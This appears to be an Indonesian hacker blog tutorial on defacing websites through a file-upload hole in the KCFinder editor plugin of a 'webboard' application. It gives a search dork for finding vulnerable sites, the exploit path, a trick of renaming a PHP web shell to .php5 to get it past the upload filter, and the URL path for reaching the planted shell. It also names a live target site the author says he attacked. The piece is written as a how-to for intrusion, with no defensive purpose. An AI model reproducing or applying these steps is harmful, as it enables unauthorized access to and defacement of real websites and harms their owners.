Tutorial Deface Kcfinder Webboard Plugin Vulnerability Upload Shell

Januari 20, 2021 Februari 13, 2021

Assalamualaikum Warahmatullahi wabaraktuh Yow Hallo Sobat Underground Kali ini gw mau kasih tutorial cara deface Poc Kcfinder Webboard Plugin vulnerability upload Shell Pastinya xD , Sediakan Bahan" nya dlu cuy ,Klo butuh penyegaran itu diatas comot :v ok Lanjut ke bahannya

Dork :

- inurl:/webboard/ site:.

Exploit

/webboard/plugins/editors/kcfinder/browse.php

Pertama Kalian Nge dork dlu seperti biasa

Nah berhubung ada live target langsung ajh kita Ekse😎

http://abttoom.com/

Ini live target saya langsung ajh kita ekse

Kita kasih Exploit nya

Nah KLO vuln biasanya seperti ini (Kcfinder) kalian klik upload nah ubah extensi Shell nya jadi php5 kalo masih ga bisa pake mini Shell ubah juga jadi php5

Setelah ke upload Akan muncul nama Shell kalian disitu dan cara akses nya?

/webboard/images/files/namafile.php5

Boom :D Berhasil Terupload Yh

Ok sekian dulu wassalamu'alaikum warahmatullahi wabaraktuh

Thanks to : Pirate07

Deface